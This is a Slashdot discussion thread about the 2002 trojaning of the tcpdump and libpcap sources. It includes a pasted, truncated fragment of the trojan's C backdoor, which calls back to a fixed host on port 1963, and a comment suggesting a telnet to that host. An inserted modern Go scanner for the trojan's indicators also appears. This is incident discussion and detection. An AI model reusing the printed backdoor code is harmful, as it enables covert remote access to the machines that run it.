Trojan Found in libpcap and tcpdump
msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."
What!? I didn't even know they were dating!
Emerge doesn't get tcpdump source from tcpdump.org, but from ibiblio.org.
How did it get into tcpdump.org's sources exactly? The HLUG page isn't clear.
apt-get update... : :-)
well, I have not installed these sniffing proggies, so it should be okay.
Now it could be worse
If you suspect your binaries to be trojanized, you'd want to sniff your own machine, but if (and it is the case) the sniffer is trojanized, then it could possibly hide such "activities"...
I actually read the article and it however seems that it was not the case here...
phew
Trolling using another account since 2005.
Who would have thought that TCPDUMP would have crap like that in it?
And if I remember right, this happened before. Of course this is one of the biggest strengths of the Open Source Model.
Code is constantly audited, checked and corrected. If your closed source software has backdoors or trojans...well....who knows, but in Open Source it is easily detected.
Seems now more than ever the need to check the authenticity of your sources before installing.
As if security auditing wasn't a big enough headache already
-- If at first you don't succeed, lie!
not really a good show for open source...
I mean, I love open source code, but does it seem that it is more susceptible to trojans being planted? I mean, any Tom, Dick and Harry can release code, and it may not be checked for things like this.
How about setting up an independent body of volunteers, who go through commonly used programs, and check for this sort of thing. Then they can issue some kind of certification or "stamp of approval" on that particular release. That way, a user can at least tell that some basic source code scrutiny was done...
Any comments welcome...
So if you're like me, and you don't actually use the source code (just precompiled versions) then you've got no problem, right?
mirror 1 in italy mirror 2 in poland
blah blah blah... just don't feel like fscker dying all by itself. yadda yadda yadda, beowulf cluster hootie hoo, slashdot should cache unfta unf, I need head
It's not unusual at all in the Unix world. Pete's sake, K. Ritchie (he who invented Unix and C, or at least part of the team) put trojans into early versions of cc and login so that he could get access to _any_ unix system.
It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.
Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...
I swear, some of these source trees are worse than the canals of Venice.
Use them.
"I'd rather have a full bottle in front of me than a full frontal lobotomy"
The program connects to 212.146.0.34 (mars.raketti.net) on port 1963
With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?
-- 7 string electric violin + live loop samplers
"It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this. "
Doesn't the money come from the money you've saved by not having to pay for any software? What did your business plan mention about this? Just a blank page, right? Try it out and see what happens? Well, it's your money!
This never used to happen. Now it is like as if someone is intentionally trying their luck to trojan open-source projects. The crack0r types usually try to claim some kind of responsibility to increase their m0j0, but I haven't heard of anyone doing so. Usually a crack0r will try to make the trojaning *bad* to further make themselves feel better, but these trojanings are often in name only, and are of no real security threat. I am wondering if this is an anti-freesoftware publicity ploy by some individual or group.
What good having 'pure' source code minus viruses, worms and trojans? MS showed the way with some Korean CDs infested with bugs. Can penguins be far behind?
If you keep throwing chairs, one day you'll break windows....
there's no-one to pay me to pay my staff for the lost man-hours caused by this.
But then again, you had to pay no-one for the man hours you saved by using the open-source code.
K. Ritchie? Are you getting confused by the K&R book? It's D. Ritchie, if memory serves.
what about winpcap?
Excuse me if I sound disrespectful, but that makes me really doubt your skills. MD4? First, usually what's used is MD5, second it's just a hash and doesn't ensure the file hasn't been tampered with. All you need is to run md5sum on the patched file.
Now, good GPG signatures would have helped.
Either that or someone has trojaned (is that a word?) his site!
The trojan contacts the following website:
http://mars.raketti.net/~mash/services
DNS Details:
Registrant:
Kuopion Puhelin Oyj (RAKETTI2-DOM)
KUOPIO, 70780
KUOPIO,70780
FI
Domain Name: RAKETTI.NET
Administrative Contact, Technical Contact:
Siltakoski Petri (SP730-ORG) admin@DOMAIN.RAKETTI.NET
Kuopion Puhelin Oyj
Levasentie 23
KUOPIO
FINLAND
+358-17-302329
Fax- +358-17-3614904
Record expires on 07-Oct-2004.
Record created on 08-Oct-1998.
Database last updated on 13-Nov-2002 08:36:01 EST.
Domain servers in listed order:
NS1.RAKETTI.NET 212.146.0.10
NS2.RAKETTI.NET 212.146.0.11
From excellent karma to terrible karma with a single +5 funny post...
Seriously, though, I think the ideal solution would be to do multiple checks of the RC5 signature of newest packages, over several mirrors. The advisory mentioned that tcpdump.org was compromised, while the mirror at ibiblio.org was OK.
Or use Gentoo Linux. Of course. I can't do that, since I don't have broadband at home... =(
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
Isn't this one too many?
There was dsniff, BitchX, OpenSSH etc. and today tcpdump and libpcap?
Does anyone else think that someone has found a security hole in a popular unix daemon and is having some fun with it before notifying the authors. Or maybe there is a *VERY NASTY* exploit circulating privately?
At least that's what I think.
"there's no-one to pay me to pay my staff for the lost man-hours caused by this."
I'm still expecting my check from MicroSoft for my lost man hours.
NO CARRIER
...could it be to search the repository for the insertion date?
there's no-one to pay me to pay my staff for the lost man-hours caused by this
Did Microsoft pay you for lost man-hours when your staff battled Nimda or Code Red? Didn't think so.
so seeing as how there's no trojan cleaning program in linux, how does a person infected with the trojan rid his system of it? is it as simple as installing the non-trojan version?
I was just wondering how long these sources have been available with these many eyes making bugs shallow and so forth? I'm assuming it's less than 1 hour, because as I keep being told, everyone in the open source community checks all source code thoroughly before installing it, which is something that can't be done with closed source.
Somebody's been messing around there, don't you think?
Making trouble today for a better tomorrow...
the pages say the latest release(7.1) is vulnerable on some mirrors, but no mention is made of the libpcap-current tarball available on tcpdump.org
It is also true that only because this is an open source project was such code found. People seem to forget that there is no really efficient way of checking closed software for security holes. On top of that, companies are more than likely to place back doors in programs as actual features that are not mentioned in documentation, or only glazed over. My example for this was in a business program that I work with, which had the "option" for you to enter a code into one of the text fields if you set the computer's date to a specific date, and then you would be able to edit all records, thus bypassing the simple code that it uses. I found out about the feature when there was a problem with some of the records, and since the files are encoded I wasn't going to search through them in any easy way, so I contacted the program's distributor and they told me of this feature. Just think how many other progs out there have stuff like that.
Yeah! Let's nail his ass! ..
Oh wait, perhaps he's just the tech guy working for the company which registered the domain "raketti.net", Kuopion Puhelin. It's a telecom and net operator after all.
"Good" being the operative keyword.
It would be best not to download the author's public key from the same place you get the source, or else you might as well be fucked. "Gee! It checks out alright, it must have come from my vendor!" Not necessarily.
This is a local ISP, a telephone company.
The good blackhats have lots of compromised machines at their disposal, and are generally way too clever to leave such an obvious clue behind.
It's possible that this guy has something to do with it, but it's more likely that his machine is owned by the same person who managed to put the trojan out there.
...wait...never mind.
Donate background CPU time to fight cancer.
...that this little incident will not be mentioned in the next edition of the Cathedral and the Bazaar?
To make laws that man cannot, and will not obey, serves to bring all law into contempt.
--E.C. Stanton
Once again, Gentoo users wouldn't have had any problems, thanks to the wonderful portage system.
The trojaned code has been around for almost a year, from the project homepage (where most people would go for the source), and nobody spotted it.
It highlights the fact that a sizeable part of the open source user base either can't read code, or don't want to.
Yes and no. The information you have successfully received from the Whois database is pointing to the phone company in Finland, which happens to be a host for raketti.net domain. Petri Siltakoski is just an administrative contact of the ISP (Raketti.Net). He has nothing to do with the web page set up by an individual who seems to have an account in this ISP.
I couldn't agree more, if those cheap-arsed hippies who write Linux would only pay up when there's a problem with their software like reputable commercial companies like Micros.. err, Oracl.. err actually, forget it.
Blaming GW Bush for the Iraq war is like blaming Ronald McDonald for the poor quality of food.
Siltakoski Petri is apparently just the guy who registered that domain. It could be that a user from that domain is involved or, as you said, that server has been r00ted. Funny, though, http://mars.raketti.net/~mash/services is nothing but a FreeBSD /etc/services file.
-- Never hit a man with glasses. Hit him with a baseball bat.
This was just sent ~1 min ago:
To : msolnik@hlug.org
Cc : wt-changes@wiretapped.net,
tcpdump-workers@tcpdump.org,
mcr@sandelman.ottawa.on.ca
Subject : tcpdump.org mirrors
----- Message Text -----
Hi guys,
I run the main mirror of tcpdump at wiretapped.net (no relation to wiretapped.us) in Australia. We rsync from cvs.tcpdump.org, and have removed the entire tcpdump.org tree and disabled rsync updates until we hear from Michael Richardson at tcpdump.org.
You may like to add this info to your Updates area, as the unavailability of the main mirror site may seem suspicious. It is not, as described above.
Because wiretapped.net itself is mirrored to a few other sites, it may take between 1 hour and 24 hours for this removal (and any subsequent re-addition) to take effect. We'll note when it goes back online at http://www.wiretapped.net/changelog.html
Hope this assists in preventing any further spread,
Grant
www.wiretapped.net
Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
I admit to not knowing a lot about open source development, not being a developer myself. But I'm curious, is there any sort of legal accountability when someone intentionally codes a trojan into a piece of software? Is it possible to keep track of who is writing what code? When trojans, etc., are discovered, are you limited to just patching them and going from there, or is it usually possible to find out who did it and therefore be suspicious of future code?
Buy the President
MD4, MD5 - whatever it takes.
(With apologies to Michael Keaton)
I have just started using Gentoo and have not finished reading through the docs yet. As such, I am unaware of how this problem would be avoided using Portage. Now if you're referring to rolling back, then I understand that...
It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this.
Do you expect sun or microsoft to pay you, either?
Who says geeks don't have condoms?
Or maybe not..
The whole Raketti.net seems to be a domain for a local telecom/ISP based in Kuopio, Finland (smallish town in east Finland). Petri Siltakoski is just probably their Admin.
They seem to be offering internet access with space for homepages, so Petri Siltakoski doesn't necessarily have to have anything to do with this..
Y(and the rest of these responses)HBT. YHL. HAND.
touch -t 200112101200 newbie.c
I thought the whole idea of the GPL was that you could take a program and modify it to your own needs so long as you release the source back to the community under the same license.
Sounds like that's what happened here!
Two paths to greatness... that which slowly climbs to the top of the summit, with all its grueling hard work and requirement of tenacity and patience. Then there is the fast and easy way of being shot up by a cannon. Unfortunately for many you will knock much of the mountain and its traversers off, unfortunately for you what comes up must come down.
Beware the venture capitalist, as he seeks to aim only at the short term, then cash in and run like hell.
He has a ton of lost down time because he didn't pay for a sniffing program.
How much would one normally pay for a sniffing program?
The time of his employees is probably valued a little higher than a piece of software he could have bought.
The only place OSS saves money is when you have to buy a per seat license yearly, or some other such excessive licensing scheme.
It isn't only a services file, if you scroll down you will find also some c source, which will be compiled on the fly.
The trojan code seems somewhat complex and unreadable at first glance. The variable names don't express much of the semantics. It doesn't even have any comments. No wonder no one notices if this kind of stuff is written into code. And this is very clear code.
Even (or especially) free software developers should use more descriptive variable names and comment their code well. It makes the code much more readable for analysis, for both security and quality reviews.
Well, ok, crackers probably want to obfuscate their code with /* Here's stuff for the trojan. */, but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.
I'd recommend the rule: "One comment per statement, except when really unnecessary." Many people think it's silly, but those people haven't had to read a lot of other people's code.
Hmm, I wonder why they used port 1963...author's birth year? Nah, that would be too old for a typical cracker.
When I first started to use open source software (back in '93), I always wondered how easy it would be to release compromised sources, whether intentionally or not.
Once I got into it, hey, I trusted these guys. They were the good guys. We were the good guys. The community was built on trust, and it worked.
We used to scoff when we heard about the trojans in the latest version of Microsoft Word. That would never happen to us... unless they sorted that WINE [wine.org] project out. ;-)
Now we face the same issues. As source distributions (I'm not discounting binary distributions - if you trust RedHat, that's your call) increase in popularity, this will become more of a problem.
We need to tighten up the procedures that we use. We need to ensure that the software we put out is the software that the users download and use. We need to ensure that nobody can compromise our systems in this way.
Any fool can talk, but it takes a wise man to listen.
"It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this. "
And this is different from Closed Source how ?
Doesn't the money come from the money you've saved by not having to pay for any software? What did your business plan mention about this? Just a blank page, right? Try it out and see what happens? Well, it's your money!
Same place it will come from if you use Closed Source software, using Open Source products does not mean zero cost IT, it means lower cost IT. If your company did plan for these things, then it will make no difference what products you are using.
Fascism should more properly be called corporatism, since it is the merger of state and corporate power - Benito Mussolini
Also feel free to telnet into mars.raketti.net port 1963 a couple hundred times (it returns M the first time and nothing after that).
Does anyone else have an issue with tcpdump.org NOT mentioning their sources were trojaned? It seems there should be some mention of "Hey, if you trusted us and didn't verify checksums, you might want to..."
I really wonder how long it (the Trojan) has been in before anyone read the code discovered it.
... where were you wanking, didn't all of you read every f...g line of that program?
... whatever flame fire that remark may start!!! (instead of flaming, look at yourselves in the mirror and admit how sometimes your attitude is ridiculous considering computer)
Hey Slashdotters, you bunch of "I know better than you" people
HA HA!!!
This is just showing that the Open Source "Community" is not more immune than any other to that kind of intrusion
Did Microsoft pay you for lost man-hours when your staff battled Nimda or Code Red? Didn't think so.
Insightful my ass. Did those virii come distributed with the product? Now you're going to tell me there are ABSOLUTELY NO possible security holes in open source software, ever right? Go on...
The reason this is a problem is that nebulous shrug of an answer to the question "Who are you trusting to provide this code which you execute?" It could be an anonymous PGP/GPG key, but to violate people's trust would mean that trusted token is no longer trusted, and thus it would identify the other risks out there.
Imagine the tcpdump distributions were signed by an anonymous key. We could look over the code, and decide to trust that key. Later, people would be able to tacitly trust that key to sign tcpdump tarballs. One day, the tcpdump code will fail to match the signature: it will be caught before being executed, and the trojan will be discovered quickly. Later, another trojan will appear, but the signature will match. A few people will be bitten, but the key will be exposed and others will be able to quickly identify their risk.
At the VERY LEAST, use MD5 sums on the files like FreeBSD ports!
--- Nothing clever here: move along now...
the article is called 'reflections on trusting trust' and Ken Thompson wrote it upon reception of the ACM distinguished scientist award. now, we all know you are full of shit (since you can't even spell his name right) but claiming that 'each version of login was compromised' is so far off base that it's not even funny.
follow the link posted already, read it and try to understand what he fundamentally tries to tell you. then go and read aleph1's 'smashing the stack for fun and profit' and try to get a glimpse of what 'hacking' was considered in the 80s.
sources that debian built these packages from have good checksums
rgoldber@supercomputer:~$ md5sum tcpdump_3.6.2.orig.tar.gz
6bc8da35f9eed4e675bfdf04ce312248 tcpdump_3.6.2.orig.tar.gz
rgoldber@supercomputer:~$ md5sum tcpdump_3.7.1.orig.tar.gz
03e5eac68c65b7e6ce8da03b0b0b225e tcpdump_3.7.1.orig.tar.gz
rgoldber@supercomputer:~$ md5sum libpcap_0.7.1.orig.tar.gz
0597c23e3496a5c108097b2a0f1bd0c7 libpcap_0.7.1.orig.tar.gz
that's not true, look at it again ...
in the middle of the fully commented services file, you find (let's hope /. doesn't eat this code post ...):
#!/bin/sh
cat >conftes.c
#include
#include
#include
#include
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1))
/dev/null 1>/dev/null
nice, isn't it?
heheh
discussion site in discourages discussion shocker
This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.
All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
And, by the way, this happens all the bl**dy time on /. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.
Yeah, I know it's off-topic. Just wanted to rant about something that irritates me. Return to your normally-scheduled bits and pieces.
Look more closely -- right in the middle of the file is C source code for the trojan.
hmmm of course /. didn't eat it completely. but go and look for yourself for the full code.
they were practicing safe sex
well, I have not installed these sniffing proggies, so it should be okay.
Darn... apt-get even makes your box more secure than before even if you haven't actually installed the bad packages? This must be the Holy Grail! And it should be okay? Not only that you have not installed tcpdump and libpcap, what definitely makes it okay, you don't even trust apt-get to really solve your (non-existing) problem... Now I wanna join the apt-get cult... Where can I register?
I bet you recommend penicillin over other medicine even when you got no infection! Or do you use apt-get then as well? Doesn't make any difference anyway...
(For the record: I use Debian GNU/Linux among other stuff...)
Does anyone know if the RedHat binaries are ok?(7.3/8.0)
This was quite a disillusionment for me. I feel so dirty. Gonna take a long shower.
Because I used the current tar ball Friday afternoon and it shows no sign of the trojan.
Do this: Download gpg from gnupg.org. Build it. Generate yourself a key. Try to get some of your friends to sign it. submit it to keyserver.net. Sign your code with that key. While you're at it, start using kmail, evolution, or mozilla with enigmail and start signing your emails too. Do it religiously.
Check sigs when you download code too.
Slackware 8.1 was released this past summer, so I'm wondering whether its tcpdump-3.7.1-i386-2 is infected.
Can anybody tell me whether checking for "mars", "mash" etc. in the output from "strings tcpdump" or "strings libpcap.a" is sufficient to show evidence of the trojan?
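The substrings named above ("mars", "mash") will hit harmless identifiers. As an added example (not code from this page or from the tcpdump project), the following Go program scans a source tree for the full indicators this thread reports: the address 212.146.0.34, the host mars.raketti.net, port 1963 in its htons() call, and the conftes.c temp file the altered configure script writes. The two-file sample tree it builds is constructed; point it at an unpacked libpcap or tcpdump tree to scan a real download.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// Indicators reported in this thread for the tcpdump/libpcap trojan, written
// without spaces because lines are whitespace-stripped before matching.
var Indicators = []string{
	"212.146.0.34",     // address the dropped program connects to
	"mars.raketti.net", // host the altered configure script fetches from
	"htons(1963)",      // the port, tied to its socket call to avoid noise
	"conftes.c",        // temp file the script writes the C source into
}

// Hit is one line in one file that contained an indicator.
type Hit struct {
	Path      string
	Line      int
	Indicator string
}

// ScanReader checks each line of r. Whitespace is removed first so that
// "htons (1963)" as posted in the thread and "htons(1963)" both match.
func ScanReader(path string, r io.Reader) []Hit {
	var hits []Hit
	sc := bufio.NewScanner(r)
	sc.Buffer(make([]byte, 0, 64*1024), 4*1024*1024) // tolerate long generated lines
	for n := 1; sc.Scan(); n++ {
		norm := strings.Join(strings.Fields(sc.Text()), "")
		for _, ind := range Indicators {
			if strings.Contains(norm, ind) {
				hits = append(hits, Hit{Path: path, Line: n, Indicator: ind})
			}
		}
	}
	return hits
}

// ScanTree scans every regular file under root, which covers the configure
// script and gencode.c that posters report as the modified files.
func ScanTree(root string) ([]Hit, error) {
	var all []Hit
	err := filepath.Walk(root, func(p string, info os.FileInfo, err error) error {
		if err != nil || !info.Mode().IsRegular() {
			return err
		}
		f, err := os.Open(p)
		if err != nil {
			return err
		}
		defer f.Close()
		all = append(all, ScanReader(p, f)...)
		return nil
	})
	return all, err
}

// Demo builds a constructed two-file tree (one clean, one altered) and scans it.
func Demo() ([]Hit, error) {
	dir, err := os.MkdirTemp("", "pcap-scan")
	if err != nil {
		return nil, err
	}
	defer os.RemoveAll(dir)
	clean := "/* constructed stand-in for an unmodified gencode.c */\nint p = htons(80);\n"
	dirty := "# constructed stand-in for an altered configure script\n" +
		"cat >conftes.c\n" +
		"sa.sin_addr.s_addr = inet_addr (\"212.146.0.34\");\n"
	for name, body := range map[string]string{"gencode.c": clean, "configure": dirty} {
		if err := os.WriteFile(filepath.Join(dir, name), []byte(body), 0o644); err != nil {
			return nil, err
		}
	}
	return ScanTree(dir)
}

func main() {
	hits, err := Demo() // constructed tree; pass a real unpacked tree as os.Args[1] instead
	if len(os.Args) > 1 {
		hits, err = ScanTree(os.Args[1])
	}
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(2)
	}
	for _, h := range hits {
		fmt.Printf("%s:%d: %s\n", h.Path, h.Line, h.Indicator)
	}
}
```

The same scan can be run over `strings` output by piping it into ScanReader, but since the configure-time payload is fetched and compiled separately, a clean binary does not prove the source tree it came from was clean.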
..that would actually be Petri Siltakoski and not the other way around..
And looking through his user profile, he's also a rocket scientist. Wow.
The posted MD5's for libpcap and tcpdump indicates that at least the sunfreeware version is OK.
http://www.sunfreeware.com/md5.html
What does the article imply with "ADM. Hmmm..."?
...as a rocket scientist I feel most compelled to answer
http://slashdot.org/comments.pl?sid=44937
...I run a successful London-based dot com
http://slashdot.org/comments.pl?sid=44933&ci
... As a lawyer myself, I can state that
http://slashdot.org/comments.pl?sid=44912&c
... I'm an avid open-source supporter
http://slashdot.org/comments.pl?sid=21
...I am an avid supported of the open-source movement [sounds familiar? that's because it is -ed]
http://slashdot.org/comments.pl?sid=20824&c
...I'm an avid supported of the open source movement [we know -ed]
http://slashdot.org/comments.pl?sid=20761&c
... I am a passionate supported of the open-source movement [geez -ed]
http://slashdot.org/comments.pl?sid=20760&c
Enjoy your job, make lots of money, work within the law. Choose any two.
irssi
fragroute, dsniff, fragrouter
BitchX
This message says Recently there have been a spat of well publicized attacks against what I would consider to be the backbone of the open source movement - it's source code distribution system. Hackers have been penetrating people who download, say, OpenSSH and then compile it to use on their systems by trojaning OpenSSH itself. This strikes at the very HEART of Open Source by making the act of installing the software a weakness. Because Open Source has no one distribution point, there are many places for someone to verify if they want to install software securely. Because there are no vendors, the sites people download software from are usually not provided with a dedicated security staff.
This is serious, guys and gals. Use the source, Luke - but what if I can't trust the source any more? Open Source has to find a method to get around this problem; see this post.
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
1. Get open-source software
2. ???
3. PROFIT!!!
And this is your favorite anonymous coward saying, "Have a better business plan if you use a better alternative such as open source."
This reminds me of this one time when I chatted this girl on IRC. Oh wait.....
I'm just typing out loud here.
Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc..
The source could still be publically available for comment and review to add to those being paid to perform the analysis.
Seems like this might be a good service, once the idea is fleshed out more...
There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.
Give a hand, not a hand-out.
Note that THE DATE ON THE FILE DOESN'T MATTER. It was trojaned last night, not last year.
The fact that someone so ineptly trojaned the source, not even bothering to generate a new md5sum, suggests that it's someone out to make it obvious looking. Someone who has a reason to discredit open source. Someone like a former script kiddie employed by microsoft...
Never mind that russian crackers were wandering round MS servers for MONTHS back in 2000...
All it does it retrieve a /etc/services file from that website.
Heh, I had only looked at the first few lines or so, and didn't think anything of it. Did anyone look in the parent directory from where that services file is? Or if the trojan gets any other files besides services?
-- Never hit a man with glasses. Hit him with a baseball bat.
I downloaded and installed (On a customer's machine even!) the file http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz back on October 24th (The link still shows up in the "visited" color in my browser even). My md5sum is 0597c23e3496a5c108097b2a0f1bd0c7, and inspection of the config script and gencode.c show no signs of the evil code.
So the trojan'd version has not been sitting there too long.
Looks like some jerk-off has discovered that overrated/underrated don't change the mod label, just the score.
Having source code freely available doesn't imply security. Ken Thompson demonstrated this very eloquently in his paper.
I'm telling you, this is Microsoft's new tactic for attacking open source. Make people afraid of it, and they will run in terror.
Scary, very scary.
In the meanwhile, I suggest that you run all your untrusted software in a sandbox like Systrace which is available for the BSDs and Linux.
This screenshot shows Dug Song detecting the trojan in the Fragroute distribution. Systrace allows you to run completely untrusted applications in a sandbox. The security policy is created on the fly with the user deciding what an application is allowed to do.
We need to be much more careful about the software that we run.
The viruses spread because of known holes in Outlook - that MS refused to fix for months, and actively took legal action against people pointing them out in the first place. Kinda like the catholic church forbidding galileo to point out that the earth went round the sun...
Goddamn, just because they might be loaded with more trojans than you'll ever need, spying on all of your important works, please, please use a closed-source spell-checker, this OS one appears to be faulty.
Reading that text was just plain painful.
Unless it was an editor. In that case, s/jerk-off/editor/g.
login as root (or whoever can run tcpdump)
tcpdump -n host 212.146.0.34 &
telnet 212.146.0.34 1963
echo 'A' (i think that was the quit code)
if tcpdump sees the connection, it isn't ignoring port 1963; if you don't see the connection, then your tcpdump is ignoring port 1963
and well, it's always nice to /. your local rooted base. the people at 212.146.0.34 should change it to something like /usr/bin/tcpd
if this test is wrong, well, so be it, i'm still new at this linux thing, but i'm better at linux than i am at spelling (boy, i should be an /. editor)
--Anonymous Coward
I moved the binaries on the tcpdump.org web site, so that the "download" links won't work.
"ls -c" says that the modified binaries were installed at Nov 11 10:14:00 2002 GMT.
Preliminary inspection says that the CVS repository is O.K.
What you're saying is perfectly valid, but what if I use common sounding variable names to make it appear as if I was doing something I wasn't? Even with MOST good programmers, they aren't ever trained to debug code in this manner (I know a few CS exams do, for sure, but I have NEVER seen a huge project train people for this).
How about this: Let's start a few grassroots projects (doesn't matter how many) and work on educating people to read obfuscated code. Identify when strtok, fopen, etc. is and is not doing harmful things to data - when it may indeed be doing something nefarious.
I started a site myself here to help myself start explaining simple stuff.. and eventually will work up to writing drop-in replacement libraries for other programs, or perhaps ways to trojan executables in memory you might have control over (ptrace?).
Let's all learn a bit, and share the knowledge.
[plug]Damn my sig makes strange sense now[/plug]
"During times of universal deceit, telling the truth becomes a revolutionary act" -- George Orwell
Interesting that there is no mention of this on the tcpdump.org website, one would think they would at least post something about it.
Don't think for a second that Microsoft hasn't put back
Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.
I know this is a stupid question but I don't understand how this ended up in the distribution in the first place.
To ensure perfect aim, shoot first and call whatever you hit the target
You are partially correct.
If you download the author's public key today when you install widget 2.3 and tomorrow Tom Blackhat replaces both the author's public key and places a trojaned widget 2.4, you will catch it when you do the upgrade because you got the legitimate key prior to its replacement. Only new downloaders will be screwed.
Obviously it is still better to place the public key in a secure location separate from the files but there is some use to the key system even if the key is replaced later.
Coding Blog
This isn't the first post of this type of thing with open source and I've always wondered if it's a big deal when I see them.
But I think I finally get the difference between Closed Source and Open Source with regards to evil code:
Closed Source with Intentional Evil Code = Law Suit
Open Source with Intentional Evil Code = Tough Luck
I know the rebuttal is - "with open source, you can find the evil code, you have more eyes looking to find that evil code" but as it has been noted in this thread, how long has it been there? A year, more? Plus look at the number of almost anonymous (if not completely anonymous) contributors to the code. Closed Source doesn't have that liability.
Sorry but this one goes grudgingly to the Closed Source win column.
I downloaded and installed libpcap and tcpdump on Nov 1. The versions I have came from tcpdump.org. md5sum shows that they have the correct checksum and not the trojaned checksum as reported on the Houston LUG page. A grep of the sources for the port number and ip found in the trojan reports null. It looks like the trojan files were placed on tcpdump.org after Nov 1, 2002.
FreeSpeech.org
When was the last time Microsoft paid you when a security hole was found in their product. YOU should have got your admins to verify the checksums before installation. The parent poster is a troll
MD5 checks work nicely. Sure, PGP in theory is better, but since MD5s are cached locally, and a helluva lot faster to check, the chances that they will actually be used and verified are seemingly quite good.
Which is to say, in practice MD5 has caught rather a lot of these problems, and in quite a timely manner.
As irrelevant as various source-distributions (e.g. lunar, source-mage and Gentoo) are at present in other respects, they make a nice 'canary' in the coal mine :-).
Linux is Linux; if one needs to clarify their dist: <Dist>/GNU Linux
bsds are of course just BSD
I don't mean to troll (and I hear you say "yeah but you are") BUT quite a few project sites seem to have been infused with trojaned downloads over the last few months. It actually makes you wonder whether there is a certain person or organization behind this, considering the fact that news like this gives these projects a bad security reputation, which counter-balances the built-in security breaches of a certain commercial software giant just nicely. Just a paranoid thought, don't take it too seriously though (I know you won't but still).
FreeBSD (don't know about other BSDs) stores the checksums either locally when installing the ports-collection or onto another server just like gentoo.
Nah probably not...
Strange women lying in ponds distributing swords is no basis for a system of government.
That's why we need a new moderator point:
-1 Caps Lock Title
"All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
And, by the way, this happens all the bl**dy time on /. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range."
You mean like yours?
and it's not the only one found today, nor in the past week... good to see that slashdot is finally reporting on this stuff.
To all those who think linux is safe and secure... guess again. It's just that you guys spend more time writing viruses and looking for 'sploits' in MS code than MS code jockeys do with linux... until now. That and the 9 to 1 ratio of users.
Isn't read-only hardware the simplest answer for this kind of attack?
If the files are coming from a CD-R, there's no trojan. Period.
Of course CD-Rs are too small for many sites. How practical is it to write-protect a HD?
Yeah, that girl on IRC was probably Jazzman.
oh.. yah.. sorry.
The win95 trojan, I forgot to tell you about.
Unfortunately, Bill wasn't man enough to tell
you about it himself, but on the other hand,
you've been running win95 flawlessly for the
last 7 years, without 1 lost manhour.
--
Silvio
Question: Since this guy is identifiable..why not have Finnish govt. start looking with him. (Of course, I realize that he may not be the actual perp...but...)
Did those viruses come distributed with the product? Now you're going to tell me there are ABSOLUTELY NO possible security holes in open source software, ever, right? Go on...
Ignoring the fact that installing certain operating system components is often worse for your computer than a virus (by installing this service pack, we may enter your computer)...
Nothing is 100% secure, and nobody ever said linux is (or not anyone intelligent, anyways). However, tallies of response time when a breach is found, and often the time in finding such a breach, are the factors at hand. You'll certainly not see MS yelling out "hey, we were hacked, check your software people," but instead something more like a quiet, um... something wrong... here patch... you fix.
And yes, lots of MS tools come with bugs in them that leave your computer so open that you might as well just invite half the web for a party. Once MS gets the patch out, if you're a decently intelligent admin/user, you can fix things up to plug the hole, or meanwhile just disable affected components, etc.
MS isn't all the problem, idiots who don't patch up are also a problem (demonstrated by the continual code red attempts shown in my webserver logs), but at least when something goes wrong we hear about it, and can expect a solution shortly after discovery.
You said: "People using source for security who are in category 1 or 2 are fooling themselves."
Not quite. Here's why:
When you trust a binary, you are trusting the builder of that binary, the system on which it was built, AND the source of the source (i.e. the CVS repository or other ultimate source of the code, and all the source delivery mechanisms and servers like FTP). When you use the source directly, you remove one more trusted item from the list. Just like the builder of the binary, you trust the source of the source, but you build it on your own system, which supposedly you trust more than someone else's.
For projects that build and provide binaries directly, there may be some trust overlap between who is the builder of the binary and the source of the source.
I generally agree, however, that if you are in category 1 or 2, you are a fool to think you are totally safe. But it is NOT equal to users of binaries since you do remove a middleman of sorts that binary users must trust.
I guess he may be one of those poor sods who got their Unix sysadmin training through this.
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
Maybe somebody has already posted this idea as a project on sourceforge..
There have been too many of these incidents lately, and it's giving OSS a bad odor. We must be careful. Telling the rest of the world closed binaries are infected often as well does not help. The damage is already done.
This is my idea to prevent most of these jokers' tricks.
